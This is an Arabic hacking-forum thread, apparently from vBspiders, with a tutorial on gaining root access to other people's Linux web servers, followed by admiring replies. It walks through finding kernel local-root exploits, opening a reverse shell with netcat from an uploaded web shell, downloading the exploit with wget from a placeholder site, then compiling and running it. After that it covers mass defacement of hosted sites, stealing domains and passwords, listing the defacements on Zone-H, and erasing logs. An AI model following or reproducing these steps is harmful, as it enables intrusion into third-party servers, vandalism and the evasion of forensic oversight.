|
|~Root In Server By ViRuS Qalaa~| http://img121.imageshack.us/img121/4017/29408923.png http://www.saudinokia.com/vb/images/...404d6ae6b2.gif اهلا وسهلا بكم ياعناكب في موضوعي (Root in server) الذي سوف يشرح لكم كيفية اخذ الروت وماذا تفعل بعد اخذ الروت وكل شيء متعلق بلروت http://img241.imageshack.us/img241/2482/eng3th2.gif في بداية الامر سوف ينقسم هذا الموضوع الى : الجزء الاول: ماهو الروت (What is root) الجزء الثاني: كيف يمكن الحصول على الروت (How can I get on the root) الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him) الجزء الرابع: اتصال بلسيرفر بكل الطريق (Contact server Every way) الجزء الخامس: الحصول على الروت (Access to root) الجزء السادس: ماذا بعد الروت (What happens after root) الجزء السابع: سحب الدومنين (The withdrawal of my domain) الجزء الثامن: عمل ماس ديفس (The work of Mass Davis) الجزء التاسع: التسجيل فى الزون اتش المواقع المخترقة (To register the zon-h hacked sites) الجزء العشر: مسح اثارك من السيرفر (Clear the tracks from the serve) الجزء الحادي عشر: بعض المواضع الاخرى للروت وبعد الروت http://i72.photobucket.com/albums/i1...ividers_55.gif http://img245.imageshack.us/img245/3537/53967678.png ===================== قبل ان ابدأ في الموضوع انة طرحت قبل هذا الموضوع موضعي [الروت تحت المجهر] وبسبب اخطأ بسيطة ان الصور انمسحت وصارت لخبطة فية وبعض المشاكل لذلك قررت ان انزل هذا الموضوع وجعلتة smilies4 مبني على ذلك الموضوع الروت تحت المجهر واضفت علية بس الشروحات الأقوى وبعض الصور التوضيحية لذلك اتمنى ان يعجبكم هذا الموضوع واتمنى ان يستفاد الكل وشكرا لك :kiss: وبدون اطالة نبدأ بلموضوع :yes: http://i72.photobucket.com/albums/i1...ividers_55.gif الجزء الاول: ماهو الروت (What is root) http://img530.imageshack.us/img530/8170/51624357.png الروت : هو اعلى صلاحية في السيرفر لينكس واذا حصل شخص على صلاحية الروت يكون السيرفر كلة في خطر تام كيف يكون السيرفر في خطر انة اقول لك يمكن بعد الحصول على الروت يمكن تسحب الدومنينات المواقع ويمكن تغير جميع انديكسات الموقع بأنديكس اختراق وهذا مايسمى بلــــماس ديفس وراح اشرح في الفقرات التالية وذا حصلت على الروت يكون السيرفر ملكك وهنا فهمنا ماهو الروت واكيد لي يريد يأخذ روت لازم يعرف ماهو الروت اصلا ويكون لدية خبرة في اختراق المواقع http://www.saudinokia.com/vb/images/...40ae70a249.gif الجزء الثاني: كيف يمكن الحصول على الروت (How can I get on the root) http://img716.imageshack.us/img716/7157/61423590.png هناك طرق كثيرة في الحصول على الروت وسوف اذكر اهم الطرق وهي...) 1-عن طريق اللوكل روت وهي استغلال ثغرة في بكرنيل السيرفر ,وحسب اصدار الكرنيل 2-عن طريق استغلال ثغرات البرنامج لي على السيرفر 3-عن طريق قرأة الملفات لي يكون فية باسورد الروت << وعتقد ان هناك درس في دورة sql كيف اخذ باسورد الروت وهم طريقة والطريقة الشائعة الان هي طريقة اللوكل الروت واصدار الكرنيل لان نشرح هذة الطريقة لكل سيرفر كرنيل واصدار لهذا الكرنيل والهكر الكبار مثلي smilies8 هههههه يجدون ثغرة لهذا الاصدار الكرنيل وينقلون هذة الثغرة في اصدار الكرنيل الى مواقع السيكورتي واحنة نستغل هذة الثغرة ومايسمى بلوكل روت وعن طريق الاستغلال هذة الثغرة في السيرفر نحصل على الروت وان شاء الله اشرح لكم الطرق الباقية بأذن الله http://img375.imageshack.us/img375/9522/54231577.png http://www.saudinokia.com/vb/images/...40ae70a249.gif الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him) في البداية لنعرف ماهو لوكل الروت :برنامج مبرمج لستغلال ثغرة في اصدار الكرنيل ولوكلات مبرمجة بلغة c وهناك لوكلات مترجمة وذا كان اللوكل مبرمجة بلغة c يحتاج لها ترجمة قبل التشغيل وسوف اشرح لكم في الفقرات التالية بس كيف نفرق بين المترجم والغير مترجم انة اقول لك اذا لوكل منتهي بمتداد c فانة غير مترجم ويحتاج ترجمة واذا لوكل منتهي بغير امتداد او اي امتداد اخر فانة مترجم بس لماذا اللوكل دائما بلغة c لان نوة الكرنيل في نضام لينكس تكون مبرمجة بلغة c شفتوا لازم تتعلموا لينكس لانهو يفيدكم كثيرا :etonnement-29[1]: http://img821.imageshack.us/img821/6893/24552557.png الان كيف نعرف لوكل المناسب لنا وكيف نقوم بلبحث عنة قي البداية عندما ترفع الشل على السيرفر نقوم بتنفيذ الامر التالي (uname -a) او يمكن رؤية اصدار الكرنيل في بداية الشل كما في الصورة التالية http://img836.imageshack.us/img836/9...2010050614.png اصدار الكرنيل : الي بلون الاخضر ذا اصدار الكرنيل ولي بلون الازرق ذا النحديث نواة الكرنيل او يمكن تنفيذ الامر التالي uname -a ايظا ليظهر لك اصدار لوكل [IMG]http://img248.imageshack.us/img248/1...2010050730.png[/IMG] الان نريد كيف نبحث على هذا اصدار الكرنيل نريد لة لوكل روت كيف اولا:عن طريق الاخ قوقل كيف تروح لقوقل وتكتب local root xxx حيث xxx نضع بدلة اصدار الكرنيل او local root exploit xxx حيث xxx اصدار الكرنيل نضعة بدلة ولازم تعرف تحديث الكرنيل مثيل 2009 او 2010 لان كل لوكل يختلف في التحديث ثانيا:عن طريق مواقع السكيورتي سوف اشرح على اهم موقع لان والاقوى هذا الموقع http://www.exploit-db.com وتضغط على كلمة Search من اعلى الخيارات ويظهر لك كما في الصورة التالية في البحث http://im1.gulfup.com/2010-09/12839835925.png ونكتب في البحث كذا localroot xxx حيث xxx نضع بدلة اصدار الكرنيل وتختار النوع وان شاء الله راح تحصل على لوكل روت المناسب وهذا مواقع لبحث على لوكل كود PHP: http://www.vbspiders.com/vb/t35673.html http://www.saudinokia.com/vb/images/...40ae70a249.gif الجزء الرابع: اتصال بلسيرفر بكل الطريق (Contact server Every way) http://img842.imageshack.us/img842/3...2010044024.png اهم يشيء بعد الحصول على لوكل روت هو الاتصال بلسيرفر يعني اذا ماتصلنة بلسيرفر ماراح نحصل على روت والاتصال بلسيرفر يعني بدل ماتروح لشل تروح لشلشة الدوس وتنفذ الاوامر وهناك طرق كثير لاتصال بلسيرفر وهناك موضوع لاخ فالكوني يشرح هذة الاتصال بثلاثة طرق وهذا رابط الموضوع شرح الاتصال العكسي باعقد السيرفرات بثلاث طرق والاتصال ينجح باذن الله وانة راح اشرح لكم طريقة رابعة لي مايستطيع فتح بورت في جهازة مثلي هناك طرق كثيرة لتسجيل في موقع ريلاكس البخيل smilies13 ماني راح اشرح انتة احصل على حساب والان بعد الحصول على حساب والان بعد الحصول على الحساب يمكنك ان تتصل وانشاء اتصال VPN الان سوف اشرح لكم الاتصال بلسيرفر بعد ماعملة اتصال VPN يلا نبدأ على بركة الله في البداية الأمر نحمل هذة الاداة وهي netcat كود PHP: الان كل شيء تمام نحمل هذا الشل وهو شل Egy_Spider العربي الاصدار الثاني القوى والافضل والاروع لحد الان في سنة 2010 الجديد كليا كود PHP: الان نذهب الى الدوس كما يلي start>>Run>>cmd تم الدخول لــــ Dos http://img819.imageshack.us/img819/6...2010045903.png ونضع الامر التالي cd\ http://img826.imageshack.us/img826/3...2010045935.png وبعد ذلك ندخل الى حافظة النت كات بلأمر cd netcat http://img299.imageshack.us/img299/1...2010045951.png تم الدخول اوكي كل شيء تمام الان نذهب الى هذا الموقع كود PHP: الان نذهب الى الشل لي احنة رافعينة على الموقع الى اخر الشل http://img29.imageshack.us/img29/525...2010051128.png http://img259.imageshack.us/img259/1...2010051138.png 1-ip لي احنة طلعناة من الموقع لي فوق 2-البورت وراح نستخدم بورت 443 البورت الخاص في اتصال ريلاكس 3-لانغير شيء 4-لاتضغ الان بعد قليل من اقول لك الان كل شيء تمام نرجع الى النت كات ونكتب الامر nc -vlp port مع تغير port الى 443 بورت اتصال ريلاكس http://img525.imageshack.us/img525/5...2010051234.png الان نضغط انتر (enter) http://img687.imageshack.us/img687/8...2010051246.png ونذهب الى الشل ونضغط رقم اربعة وهو (Connect) http://img259.imageshack.us/img259/1...2010051138.png الان تم الاتصال بلشل الان انتهينة من هذة الخطوة الحمد لله http://img841.imageshack.us/img841/3...2010051337.png http://img405.imageshack.us/img405/4...2010051351.png ولي مايستطيع الحصول على حساب ريلاكس يمكنة استخدام هذا البرنامج فهوا عملة نفس عمل حساب ريلاكس واسم البرنامج هو proXPN ويمكنك البحث عنة بغرغور (يعني قوقل) وسوف تجد لة شروحات كثيرة وهو مشهور جدا ^_* http://www.saudinokia.com/vb/images/...40ae70a249.gif الجزء الخامس: الحصول على الروت (Access to root) بعد ما اتصلنة بلسيرفر ووجدنة اللوكل المناسب الان نريد سحب الروت على السيرفر اول شيء لحصول على الروت هو سحب لوكل على الموقع ويقصل ان يكون المجلد يحمل تصريح 777 ويسحب اللوكل بامر wegt www.viers.com/localroot.zip wegt<<<الامر السحب www.viers.com/local.zip<<<موقع لوكل او انتة ترفع لوكل على اي موقع مجاني ويفض لوكل بمتداد zip الان تم السحب نفط الضغط بامر unzip local.zip unzip<<<امر فك الضغط local.zip<<<اسم لوكل مع الامتداد الان نعطي لوكل تصريح 777 بامر chmod 777 local.c chmod<<<امر تغير تصريح اي ملف 777<<<رقم التصريح local.c<<<لوكل بعد ذلك نترجم اللوكل بامر التالي gcc local.c –o local بعد سوف تجد لوكل بدون امتداد هكذا local بعد ذلك نعطي اللوكل المترجم تصريح 777 بامر التالي chmod 777 local بعد ذلك نشغل اللوكل بامر local ./ وسوف يشتغل لوكل نقوم بتنفيذ الامر التالي لرؤية الاصلاحية الان id الان صلاحيتنة روت ننفذ لامر التالي su لحصول على صلاحية روت كاملة http://img840.imageshack.us/img840/6...2010113941.png وهذا شرح لحصول على الروت [hide]اضغط هنا [/hide] [hide] كود PHP: لكن هناك لوكلات مختلفة يراد لة عمل مختلف لكن اذا تريد تحترف في اخذ روت واي سيرفر يقابلك تأخذ روت وتتجاوز اي معوق امامك علية اذان حمل كل هذة الدرس قي الموضوع التالي اضغط هنا http://www.saudinokia.com/vb/images/...40ae70a249.gif الجزء السادس: ماذا بعد الروت (What happens after root) http://img29.imageshack.us/img29/922/snapshot6iw.png بعد الروت ماذا تفعل اممممم تعرف كل شيء تستطيع ان تفعلة مثل سحب الدومينات المواقع ورفع الانديكس على الموقع على السيرفر ومايسمى (بلماس ديفس) وتستطيع سحب الباسوردات المواقع وسحب السي بنلات المواقع بختصار كل شيء تسطتيع ان تفعل مسح تعديل على المواقع وغيرة لكن انة سوف اشرح لكم اهم الاشياء بلـــروت ودائما الهكر تفعلة وهي عمل ماس ديفس وهي تغير جميع انديكسات السيرفرات الى انديكس الاختراق وسحب الدومينات السيرفر ..الخ http://img155.imageshack.us/img155/2...2010063916.png http://www.saudinokia.com/vb/images/...40ae70a249.gif الجزء السابع: سحب الدومنين (The withdrawal of my domain) راح اعطيكم شرح فيديوا لسحب الدمنين المواقع على السيرفر الحقوق او الطريق محفوظة لمنتديات القراصنة السعودية [hide] كود PHP: http://www.saudinokia.com/vb/images/...40ae70a249.gif الجزء الثامن: عمل ماس ديفس (The work of Mass Davis) الماس الديفس الفائدة من هو تغير جميع صفحات المواقع لي على السيرفر الى انديكس الاختراق بدل ماتروح لموقع موقع وتغير الانديكس مثلا يوجد انديكس في مجلد وفية مجلد اخر داخل هذا المجلد وفية index.html يقوم بتغيرة منة هنا تأتي الفائدة من هذة السكريب طبعا السكريب بلغة البيرل perl وهنا شرح فيديوا لعمل ماس ديفس + السكريب لعمل ماس ديفس اضغط هنا لتحميل جميع الحقوق محفوضة لصاحب الشرح http://www.saudinokia.com/vb/images/...40ae70a249.gif الجزء التاسع: التسجيل فى الزون اتش المواقع المخترقة (To register the zon-h hacked sites) http://img710.imageshack.us/img710/8...2010110627.png بعد ماتقوم بعمل ماس ديفس وتغير جميع الانديكسات الموقع وتريد سجل اختراق المواقع لي على السيرفر في زون اتش والمواقع لي على السيرفر 250 موقع كيف اذا سجل الاختراق تأخذ واحد واحد بس هاي العملية طويلة ومجهدة لذلك اتى سكريب بلغة البيريل يسجل اخترقاتك في الزون اتش بدقيقة وهذا شرح موجود في المنتدى سكربت للتسجيل بالزون إتش http://img683.imageshack.us/img683/9012/offlineu.jpg http://www.saudinokia.com/vb/images/...40ae70a249.gif الجزء العشر: مسح اثارك من السيرفر (Clear the tracks from the serve) http://img826.imageshack.us/img826/5870/23983143.png بعد عمل ماس ديفس لازم نقوم بمسح اثارك على السيرفر ويوجد بياناتك في ملف اسمة لوقل هسة تقول لي ماهو ملف لوقل هو ملف يقوم بحفظ اي بي تبعك واثاراك على السيرفر طيب كيف نمسحة انة اقول لك بمجموعة من الأوامر تنفذة على السيرفر وسوف ينمسح ملف لوقل بأذن الله وهذة الأوامر:قم بتنفيذ بعد الحصول على صلاحية الروت وعمل ماس ديفس *_* [hide] كود PHP: http://www.saudinokia.com/vb/images/...40ae70a249.gif الجزء الحادي عشر: بعض المواضيع الاخرى للروت وبعد الروت [ مآ بعد آلروت ] وش تـسوي .. آدخل آقلك .. http://www.vbspiders.com/vb/t4378.html http://www.al-wed.com/pic-vb/926.gif شرح حصول على صلاحيات root من لوحة تحكم ][WHMC][ http://www.vbspiders.com/vb/t36205.html http://www.al-wed.com/pic-vb/926.gif شرح اخذ رووت عبر ثغرات الكرنال او بما يسمى لوكال رووت (فديو) http://www.vbspiders.com/vb/t5012.html http://www.al-wed.com/pic-vb/926.gif وفي مواضيع كثير بلمنتدى ابحث عنها بلمنتدى وسوف تجدها بأذن الله http://www.al-wed.com/pic-vb/926.gif http://www.saudinokia.com/vb/images/...40ae70a249.gif اتمنى ان يعجبكم موضيعي واتمنى ان تفهوا كيف اخذ الروت ولي مايعرف بعد كيف يأخذ روت خل يبطل افضل لك smilies18 لاتحرموني من ردرودك ولاتنسوى التقيم وان شاء الله فية المزيد والمزيد :Great: من اجل تطوير هذا المنتدى الرائع وشكرا لك وتحياتي وتقديري الى الكل :00001734[1]: تم الشرح بواسطة: ViRuS Qalaa جميع الحقوق محفوظة smilies11 والى لقاء ولاتنسوا التقيم + الردود والاهداء الموضوع الى : الى كل اعضاء ومدراء ومشرفين ومراقبين المنتدى http://www.saudinokia.com/vb/images/...40d4926c7e.gif |
مشكور جدا يسعدني ان اكون اول من يرد على المووضع الرائع من كل النواحي يثبت للاهمية |
مشاء الله تبارك الرحمن هذي المواضيع الي يستحق فيها الشخص التقييم وبصراحه موضوع قوي الى الأمام حبيبي وبتوفيق |
ماقصرررت ياشنب |
very very very good exelent |
[align=center]موضوع اكثر من روعة تسلم ايدك يا ابن بلادي هههه الشبح ثبت انا راح بقييم ^_^ تحياتي[/align] |
اخي بارك الله فيك على هذا الموضوع الرائع |
شكرا لكم على هذة الردود الرائع بارك الله فيكم وشكرا لكم على المرور العطر وشكر خاص لشبح المرح على التثبيت واقول لك القادم ان شاء الله اقوى واقوى من اجل رقي هذا المنتدى الاكثر من رائع وتحياتي الى الكل |
واااااو شرح ولا أروع |
موضوع رائع بكل معنى الكلمة وتستحق التقييم بجدارة مشكوووووووووور |
مبدع ما شااء الله عليك :) لا تحرمنآ من جديدك ~~ |
مشاء الله تبارك الله ادهلتـنـي بهدا الشرح الـرائـع هذي المواضيع الي يستحق فيها الشخص التقييم وبصراحه موضوع قوي الى الأمام حبيبي وبتوفيق |
موضوع رائع بارك الله فيك واصل يا مبدع |
رائع جدااا مشكور اخي |
مشكووووووووووور |
| الساعة الآن 01:36 AM |
[ vBspiders.Com Network ]